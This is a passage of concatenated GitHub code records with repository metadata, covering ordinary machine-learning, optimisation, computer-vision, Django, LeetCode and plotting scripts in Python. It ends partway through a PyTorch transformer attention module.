"models.Userapps", "line_number": 127, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "9353946390", "text": "import autograd.numpy as anp\n\n\ndef calc_distance_to_weights(F, weights, utopian_point):\n norm = anp.linalg.norm(weights, axis=1)\n F = F - utopian_point\n\n d1 = (F * weights).sum(axis=1) / norm\n d2 = anp.linalg.norm(F - (d1[:, None] * weights / norm[:, None]), axis=1)\n\n return d1, d2\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/decomposition/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 298, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "autograd.numpy.linalg.norm", "line_number": 5, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 5, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 5, "usage_type": "name"}, {"api_name": "autograd.numpy.linalg.norm", "line_number": 9, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 9, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "22698519872", "text": "\"\"\"Peform hyperparemeters search\"\"\"\n\nimport argparse\nimport os\nfrom subprocess import check_call\nimport sys\nimport torch\nimport numpy as np\n\nimport utils\n\n\nPYTHON = sys.executable\nparser = argparse.ArgumentParser()\nparser.add_argument('--base_dir_cpu', default=\"C:/Users/H/Documents/Haifa Univ/Thesis/DL-Pytorch-data\",\n help='path to experiments and data folder in CPU only. not for Server')\nparser.add_argument('--parent_dir', default='experiments/base_model_weighted_schi_dist/syn-color/three_layers',\n help='Directory containing params.json')\nparser.add_argument('--data_dir', default='data/color-syn-one-color-big', help=\"Directory containing the dataset\")\n# parser.add_argument('--early_stop', type=bool, default=True, help=\"Optional, do early stop\")\n\n\n# 'experiments/learning_rate',\n\ndef launch_training_job(parent_dir, data_dir, early_stop, job_name, params):\n \"\"\"Launch training of the model with a set of hyperparameters in parent_dir/job_name\n\n Args:\n model_dir: (string) directory containing config, weights and log\n data_dir: (string) directory containing the dataset\n params: (dict) containing hyperparameters\n \"\"\"\n # Create a new folder in parent_dir with unique_name \"job_name\"\n model_dir = os.path.join(parent_dir, job_name)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # Write parameters in json file\n json_path = os.path.join(model_dir, 'params.json')\n params.save(json_path)\n\n # print(os.getcwd())\n os.chdir(curr_dir)\n # Launch training with this config\n # adding compatibility to do early stop when searching for hyperparams\n cmd = \"{python} train.py --model_dir={model_dir} --data_dir {data_dir} --early_stop {early_stop}\".format(python=PYTHON, model_dir=model_dir,\n data_dir=data_dir, early_stop=early_stop)\n print(cmd)\n check_call(cmd, shell=True)\n\n\nif __name__ == \"__main__\":\n # Load the \"reference\" parameters from parent_dir json file\n curr_dir = os.getcwd()\n args = parser.parse_args()\n if args.base_dir_cpu and not torch.cuda.is_available():\n # args.parent_dir = os.path.join(args.base_dir_cpu, args.parent_dir)\n # args.data_dir = os.path.join(args.base_dir_cpu, 
args.data_dir)\n os.chdir(args.base_dir_cpu)\n\n json_path = os.path.join(args.parent_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n params = utils.Params(json_path)\n\n # Perform hypersearch over one parameter\n\n learning_rate = None\n dropout_rate = None\n hidden_sizes = list(range(100, 301, 50))\n num_epochs = [1000]\n num_epochs.extend([5000 * 2 ** i for i in range(4)])\n\n for hidden_size in hidden_sizes:\n for num_epoch in num_epochs:\n job_name = \"\"\n # Modify the relevant parameter in params\n if learning_rate is not None:\n params.learning_rate = learning_rate\n job_name += \"learning_rate_{}_\".format(learning_rate)\n if hidden_size is not None:\n params.hidden_size = hidden_size\n job_name += \"hidden_size_{}_\".format(hidden_size)\n if dropout_rate is not None:\n params.dropout_rate = dropout_rate\n job_name += \"dropout_{}_\".format(dropout_rate)\n if num_epoch is not None:\n params.num_epochs = num_epoch\n job_name += \"num_epochs_{}_\".format(num_epoch)\n\n # Launch job (name has to be unique)\n # job_name = \"learning_rate_{}_hidden_size_{}_dropout_{}_num_epochs_{}\"\\\n # .format(learning_rate, hidden_size, dropout_rate, num_epochs)\n if not job_name is False:\n launch_training_job(args.parent_dir, args.data_dir, params.early_stop, job_name, params)\n else:\n print(\"no hyperparams chosen\")\n", "repo_name": "Hadar-Sha/Deep-Learning", "sub_path": "pytorch/schi/search_hyperparams.py", "file_name": "search_hyperparams.py", "file_ext": "py", "file_size_in_byte": 3998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.executable", "line_number": 13, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 49, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "utils.Params", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "10048921406", "text": "\n\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom reconstruction import reconstruct_pairs\nfrom reconstruction_utils.utils import extrinsic_vecs_to_matrix, extrinsic_matrix_to_vecs\nfrom pathlib import Path\n\nfrom tests.common_tests import arrays_equal\n\n\ndef test_reconstruction(intrinsics, distortion, xyz):\n \"\"\"\n testing 3D 
reconstruction working\n We create fake data by projecting a set of defined 3D points into\n 2 different camera views- one with extrinsics as all 0 and the other translated in the X dimension\n \"\"\"\n\n # Create reference points. This is in 3D, in camera space. i.e. along z-axis.\n #xyz = np.array([[0.0, 0.0, 200.0],\n # [0,0,100]])\n\n # Project points to first camera\n projected_points_1, _ = cv2.projectPoints(xyz,\n rvec=np.zeros((1, 3)), # No rotations or translations, so world coords==camera coords.\n tvec=np.zeros((1, 3)),\n cameraMatrix=intrinsics,\n distCoeffs=distortion)\n\n # defining extrinsics of second camera. Just translation in x.\n extrinsics_matrix = np.eye(4, 4)\n extrinsics_matrix[0][3] = 10\n rvec_1, tvec_1 = extrinsic_matrix_to_vecs(extrinsics_matrix)\n # RT 4x4 matrix between cam1 and cam 2\n RT = extrinsic_vecs_to_matrix(rvec_1, tvec_1)\n\n # Project to 2nd camera.\n projected_points_2, _ = cv2.projectPoints(xyz,\n rvec=rvec_1,\n tvec=tvec_1,\n cameraMatrix=intrinsics,\n distCoeffs=distortion)\n\n # undistorting 2d points\n kp1_matched = cv2.undistortPoints(projected_points_1.astype('float32'), intrinsics, distortion, None,\n intrinsics)\n kp2_matched = cv2.undistortPoints(projected_points_2.astype('float32'), intrinsics, distortion, None,\n intrinsics)\n\n kp1_matched = kp1_matched.squeeze(1).T # (2XN)\n kp2_matched = kp2_matched.squeeze(1).T # (2XN)\n\n # reconstruct points\n D3_points, colour_mask = reconstruct_pairs('opencv', kp1_matched, kp2_matched, intrinsics, RT)\n\n # Check reconstructed points equals original point\n print('orig')\n print(xyz)\n print('triang')\n print(D3_points.round())\n arrays_equal(xyz, D3_points)\n\n", "repo_name": "swishswish123/3D_reconstruction", "sub_path": "tests/test_reconstruction.py", "file_name": "test_reconstruction.py", "file_ext": "py", "file_size_in_byte": 2524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.projectPoints", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 33, "usage_type": "call"}, {"api_name": "reconstruction_utils.utils.extrinsic_matrix_to_vecs", "line_number": 35, "usage_type": "call"}, {"api_name": "reconstruction_utils.utils.extrinsic_vecs_to_matrix", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.projectPoints", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.undistortPoints", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.undistortPoints", "line_number": 49, "usage_type": "call"}, {"api_name": "reconstruction.reconstruct_pairs", "line_number": 56, "usage_type": "call"}, {"api_name": "tests.common_tests.arrays_equal", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "23022019379", "text": "from cifar10_web import cifar10\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nXtr, Ytr, Xte, Yte = cifar10(path=None)\n\n\nclass NearestNeighbor(object):\n def __init__(self):\n self.Ytr = None\n self.Xtr = None\n\n def train(self, X, y):\n \"\"\" X is N x D where each row is an example. 
Y is 1-dimension of size N \"\"\"\n # the nearest neighbor classifier simply remembers all the training data\n self.Xtr = X\n self.Ytr = y\n\n def predict(self, X):\n \"\"\" X is N x D where each row is an example we wish to predict label for \"\"\"\n # pre_all = []\n all_result = np.zeros((X.shape[0],10), dtype = int)\n print(all_result)\n for i in range(X.shape[0]):\n print(i)\n # print(X.shape)\n d1 = X[i] - self.Xtr\n # print(d1.shape)\n # print(\" \")\n d1 = np.absolute(d1)\n d1 = np.sum(d1, axis=1)\n # print(d1)\n result = np.argmin(d1)\n # print(result)\n pre = self.Ytr[result]\n # print(pre)\n # pre_all.append(pre)\n all_result[i] = pre\n print(pre)\n\n image = X[i].reshape(3, 32, 32)\n image = image.transpose(1, 2, 0)\n plt.imshow(image)\n\n closest_train_image = Xtr[result]\n image = closest_train_image.reshape(3, 32, 32)\n image = image.transpose(1, 2, 0)\n plt.figure()\n plt.imshow(image)\n plt.show()\n return all_result\n\n\ndef calc_accuracy(predict, gt):\n predict = np.argmax(predict, axis=1)\n gt = np.argmax(gt, axis=1)\n return np.mean(predict == gt) * 100.0\n\n\nnn = NearestNeighbor() # create a Nearest Neighbor classifier class\nnn.train(Xtr, Ytr) # train the classifier on the training images and labels\nYte_predict = nn.predict(Xte[0:10]) # predict labels on the test images\n\n# and now print the classification accuracy, which is the average number\n# of examples that are correctly predicted (i.e. label matches)\naccuracy = calc_accuracy(Yte_predict, Yte[0:10])\nprint('accuracy: ', accuracy)\nprint(Yte_predict)", "repo_name": "bethelmelesse/ComputerVisionCourse", "sub_path": "NearestNeigbour.py", "file_name": "NearestNeigbour.py", "file_ext": "py", "file_size_in_byte": 2148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cifar10_web.cifar10", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "72686821608", "text": "# This file is used to run a grid search algorithm to tune the SVM\n# to run in command line use : python gridsearch.py algorithm_file.csv 0\n#the file will take a moment before printing out \"Starting Script...\"\n\n# Libraries\nimport sys\nimport time\n#import datetime\nimport pandas as pd\n# from sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import 
SVC\n\n#Main--------------------------------------------------------------\nif __name__ == \"__main__\":\n # Pick model by uncommenting the appropriate line #\n\n print(\"Starting Script...\")\n #sys.argv[0] is the name of the script\n data_file = sys.argv[1]\n save = int(sys.argv[2])\n # model_name = str(sys.argv[3])\n \n #read in the data file\n data = pd.read_csv(data_file)\n X = data.drop('Class',axis = 1)\n y = data.Class\n \n #set up the grid search\n \n #parameters to tune\n k_list = ['rbf']#['linear','rbf','poly']#,'sigmoid']#,'precomputed']\n gam_list = [0.1]#,0.125]#['auto',0.01,0.1]#,.5,1,10,100]\n c_list = [220,300]#list(range(185,205,1))#[195,197,199]\n # deg_list = [1,2,3,4]#,5]\n\n #all together\n param_dict = dict(kernel=k_list,gamma=gam_list,C = c_list)\n\n #model\n model = SVC()\n\n grid = GridSearchCV(cv=3,estimator=model, param_grid=param_dict)\n start = time.time()\n grid.fit(X,y)\n end = time.time()\n runtime = end-start\n print('Minutes:',runtime/60) \n\n print(\"Best Score:\",grid.best_score_)\n print('Params:',grid.best_params_)\n \n if(save):\n #write paramater that were searched and the best selected and the date\n import datetime\n now = datetime.datetime.now()\n param_string = 'Params Searched:' + str(param_dict) #param dictionary\n grid_best_score = \"Best Score:\" + str(grid.best_score_)\n grid_best_parms = 'Best Params:' + str(grid.best_params_)\n \n filename = 'best_params.txt' #create file\n file_obj = open(filename,w)\n file_obj.write(\"Date/Time:\" + str(now)[:-7] + '\\n') #write the date\n file_obj.write(param_string + '\\n')\n file_obj.write(grid_best_score + '\\n')\n file_obj.write(grid_best_params + '\\n')\n \n file_obj.close()\n \n print('Params written to: ' + filename)\n \n\n print(\"End Script\")\n\n\n### End of Script ###\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "zachdtaylor/MathArticleCategorizer", "sub_path": "gridsearch.py", "file_name": "gridsearch.py", "file_ext": "py", "file_size_in_byte": 2384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "9355232210", "text": "import unittest\n\nfrom pymoo.algorithms.nsga2 import NSGA2\nfrom pymoo.algorithms.so_genetic_algorithm import GA\nfrom pymoo.factory import get_crossover, get_problem\nfrom pymoo.optimize import minimize\n\n\nclass CrossoverTest(unittest.TestCase):\n\n def test_crossover(self):\n\n for crossover in ['real_de', 'real_sbx', 'real_exp']:\n print(crossover)\n method = GA(pop_size=20, crossover=get_crossover(crossover, prob=0.95))\n minimize(get_problem(\"sphere\"), method, (\"n_gen\", 20))\n\n for crossover in ['bin_ux', 'bin_hux', 'bin_one_point', 'bin_two_point']:\n print(crossover)\n method = NSGA2(pop_size=20, crossover=get_crossover(crossover, prob=0.95))\n minimize(get_problem(\"zdt5\"), method, 
(\"n_gen\", 20))\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/tests/operators/test_crossover.py", "file_name": "test_crossover.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pymoo.algorithms.so_genetic_algorithm.GA", "line_number": 15, "usage_type": "call"}, {"api_name": "pymoo.factory.get_crossover", "line_number": 15, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.algorithms.nsga2.NSGA2", "line_number": 20, "usage_type": "call"}, {"api_name": "pymoo.factory.get_crossover", "line_number": 20, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 21, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 21, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "72070909607", "text": "# 完全二叉树是每一层(除最后一层外)都是完全填充(即,节点数达到最大,第 n 层有 2ⁿ⁻¹ 个节点)的,并且所有的节点都尽可能地集中在左侧。 \n# \n# 设计一个用完全二叉树初始化的数据结构 CBTInserter,它支持以下几种操作: \n# \n# \n# CBTInserter(TreeNode root) 使用根节点为 root 的给定树初始化该数据结构; \n# CBTInserter.insert(int v) 向树中插入一个新节点,节点类型为 TreeNode,值为 v 。使树保持完全二叉树的状态,并返回插入的\n# 新节点的父节点的值; \n# CBTInserter.get_root() 将返回树的根节点。 \n# \n# \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:inputs = [\"CBTInserter\",\"insert\",\"get_root\"], inputs = [[[1]],[2],[]]\n# 输出:[null,1,[1,2]]\n# \n# \n# 示例 2: \n# \n# \n# 输入:inputs = [\"CBTInserter\",\"insert\",\"insert\",\"get_root\"], inputs = [[[1,2,3,4,\n# 5,6]],[7],[8],[]]\n# 输出:[null,3,4,[1,2,3,4,5,6,7,8]]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 最初给定的树是完全二叉树,且包含 1 到 1000 个节点。 \n# 每个测试用例最多调用 CBTInserter.insert 操作 10000 次。 \n# 给定节点或插入节点的每个值都在 0 到 5000 之间。 \n# \n# \n# \n# \n# 注意:本题与主站 919 题相同: https://leetcode-cn.com/problems/complete-binary-tree-\n# inserter/ \n# Related Topics 树 广度优先搜索 设计 二叉树 👍 11 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\n\nclass CBTInserter:\n\n def __init__(self, root: TreeNode):\n self.root = root\n # 队列保存缺少 左 或者 左右 子节点的叶子节点。\n self.q = deque()\n self.q.append(root)\n while self.q[0].left and self.q[0].right:\n node = self.q.popleft()\n if node.left:\n self.q.append(node.left)\n if node.right:\n self.q.append(node.right)\n\n def insert(self, v: int) -> int:\n insert_node = TreeNode(val=v)\n node = self.q[0]\n if not node.left:\n # 节点没有左右叶子节点,则插入节点为左叶子节点\n node.left = insert_node\n else:\n # 有左叶子节点,没有右叶子节点\n node.right = insert_node\n self.q.append(node.left)\n self.q.append(node.right)\n self.q.popleft()\n return node.val\n\n def get_root(self) -> TreeNode:\n return self.root\n\n\n# Your CBTInserter object will be instantiated and called as such:\n# obj = CBTInserter(root)\n# param_1 = obj.insert(v)\n# param_2 = obj.get_root()\n# leetcode submit region end(Prohibit modification and deletion)\n", "repo_name": "zh805/algorithm", "sub_path": "leetcode/python/leetcode/editor/cn/[剑指 Offer II 043]往完全二叉树添加节点.py", "file_name": "[剑指 Offer II 043]往完全二叉树添加节点.py", "file_ext": "py", "file_size_in_byte": 2930, 
"program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31628077130", "text": "import pandas as pd\nimport glob\nimport numpy as np\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, default=\"\", help=\"input path\")\nparser.add_argument('--warmup', type=int, default=1, help=\"time in nanoseconds of the warmup\")\nargs = parser.parse_args()\n\ndef get_files(path):\n files = glob.glob(path+\"/*.csv\")\n files = [i for i in files]\n files.sort()\n return files\n\ndef get_names(files):\n names = []\n for file in files:\n if \"SMALL\" in file:\n names.append(\"SMALL\")\n if \"MEDIUM\" in file:\n names.append(\"MEDIUM\")\n if \"LARGE\" in file:\n names.append(\"LARGE\")\n return names\n\nfiles = get_files(args.input)\nnames = get_names(files)\nprint(files)\nprint(names)\n\napps = []\ntimes = []\n\nstat_to_plt = \"iout\"\n\nfor file in files[0:2]:\n c_title=\"time,vin,va,vb,vout,_vout_mean,vout_mean,iin,iout,proc_load,enable,prediction,ttn,rt\"\n df= pd.read_csv(file, header=None, names=c_title.split(\",\"))\n apps.append([i for i in np.array(df[stat_to_plt][args.warmup:])])\n times.append([i/1000 for i in np.array(df[\"time\"][args.warmup:])])\n print(len(times[-1]), len(apps[-1]))\n\nprint(len(apps),len(times))\n\nfig, axs = plt.subplots(1, 1, tight_layout=True)\nfig.set_size_inches(8,4)\nfor i, t, n in zip(apps, times, names):\n axs.plot(t, i, linewidth=1, label=n)\naxs.legend()\n#axs.set_yticks(np.arange(0.70,1.10,0.05))\naxs.set_xlabel(\"Time (ns)\")\n#axs.set_ylabel(\"Vout (V)\")\naxs.set_ylabel(\"Idevice (A)\")\nfig.suptitle(\"Device Current Swaptions 8c/8t Harvard PDN\")\nplt.show()\n", "repo_name": "atsmith3/predict-T", "sub_path": "python/analysis/i_plot_mc.py", "file_name": "i_plot_mc.py", "file_ext": "py", "file_size_in_byte": 1580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "72259532648", "text": "from django.shortcuts import get_object_or_404, redirect, render\n\nfrom profiles.models import ProfileCategory\nfrom tasks.forms import TaskForm\nfrom tasks.models import Task\n\n\ndef create_task_view(request, pk):\n task_list = get_object_or_404(ProfileCategory, pk=pk)\n if request.method == \"POST\":\n form = TaskForm(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.task_list = task_list\n task.save()\n return redirect('list', pk=pk)\n else:\n form = TaskForm()\n return render(request, 'tasks/create-task.html', {'form': form})\n\n\ndef delete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.delete()\n return 
redirect('list', pk=pk)\n\n\ndef complete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.is_done = True\n task.save()\n return redirect('list', pk=pk)\n\n\ndef incomplete_task_view(request, pk, task_id):\n task = get_object_or_404(Task, pk=task_id)\n task.is_done = False\n task.save()\n return redirect('list', pk=pk)\n", "repo_name": "kaidenvlr/todo-app-django", "sub_path": "tasks/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 9, "usage_type": "call"}, {"api_name": "profiles.models.ProfileCategory", "line_number": 9, "usage_type": "argument"}, {"api_name": "tasks.forms.TaskForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "tasks.forms.TaskForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 29, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 36, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "38309442702", "text": "# Map to show the distribution of confirmed coronavirus cases across the world (circular markers).\n# Student Action: Run the code below.\n#Data Source https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_time_series.git\nimport pandas as pd # Data processing \nimport matplotlib.pyplot as plt # Data visualisation\nimport folium # Cartograms / maps\nconf_csv = 'COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\nconf_df = pd.read_csv(conf_csv)\nworld_map = folium.Map(location=[0, 0], width='100%', height='80%', tiles='Stamen Toner', zoom_start=2.25)\nlast_col = conf_df.columns[-1]\nfor i in conf_df.index:\n folium.Circle(location=[conf_df.loc[i, 'Lat'], conf_df.loc[i, 'Long']], \n radius=int(conf_df.loc[i, last_col]), \n popup=conf_df.loc[i, 'Country/Region'] + '\\n' + str(conf_df.loc[i, last_col]),\n color='crimson', fill=True, fill_color='crimson').add_to(world_map)\nworld_map", "repo_name": "LPinto98/Data-Visualization-in-Python", "sub_path": "map.py", "file_name": "map.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 9, "usage_type": "call"}, {"api_name": "folium.Circle", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "74773841447", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is 
[here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\n# JEB: Ugly but will do for right now\nfrom config import get_device\ndevice = get_device()\n\nclass Head(nn.Module):\n \"\"\" one head of self-attention \"\"\"\n\n def __init__(self, head_size: int, n_embd: int, block_size: int, dropout: float):\n super().__init__()\n self.key = nn.Linear(n_embd, head_size, bias=False)\n self.query = nn.Linear(n_embd, head_size, bias=False)\n self.value = nn.Linear(n_embd, head_size, bias=False)\n self.register_buffer('tril', torch.tril(torch.ones(block_size, block_size)))\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n B, T, C = x.shape\n # Every single node is emiting a query and a key vector.\n # The Query vector is what I'm looking for.\n # The Key vector is what do I contain.\n k = self.key(x) # (B,T,C)\n q = self.query(x) # (B,T,C)\n # compute attention scores (\"affinities\")\n # The dot product between the key and the query. My query time the dot product of all the other tokens.\n # If the key and query are aligned, they will interact for a higher amount, and I'll learn about that\n # specific token. \n # We need to transpose the key but k has three dimensions. We only want to transpose the two last\n # dimensions.\n wei = q @ k.transpose(-2, -1) * C**-0.5 # (B, T, C) @ (B, C, T) -> (B, T, T)\n # We apply the upper triangular mask. Remove communications with future nodes.\n wei = wei.masked_fill(self.tril[:T, :T] == 0, float('-inf')) # (B, T, T)\n # We exponentiate and normalize. Each line has it sums of values . Remove communications with future nodes.\n wei = F.softmax(wei, dim=-1) # (B, T, T)\n wei = self.dropout(wei)\n # perform the weighted aggregation of the values.\n # x is the private information to this token. 
v is what I will communicate if you pesk me.\n v = self.value(x) # (B,T,C)\n out = wei @ v # (B, T, T) @ (B, T, C) -> (B, T, C)\n return out\n\n\nclass MultiHeadAttention(nn.Module):\n \"\"\" multiple heads of self-attention in parallel \"\"\"\n\n def __init__(self, num_heads: int, head_size: int, n_embd: int, block_size: int, dropout: float):\n super().__init__()\n self.heads = nn.ModuleList([Head(head_size, n_embd, block_size, dropout) for _ in range(num_heads)])\n self.proj = nn.Linear(n_embd, n_embd)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n out = torch.cat([h(x) for h in self.heads], dim=-1)\n out = self.dropout(self.proj(out))\n return out\n\n\nclass FeedFoward(nn.Module):\n \"\"\" a simple linear layer followed by a non-linearity \"\"\"\n\n def __init__(self, n_embd: int, dropout: float):\n super().__init__()\n self.net = nn.Sequential(\n # DFF is 4 time n_embd\n nn.Linear(n_embd, 4 * n_embd),\n nn.ReLU(),\n nn.Linear(4 * n_embd, n_embd),\n nn.Dropout(dropout),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass 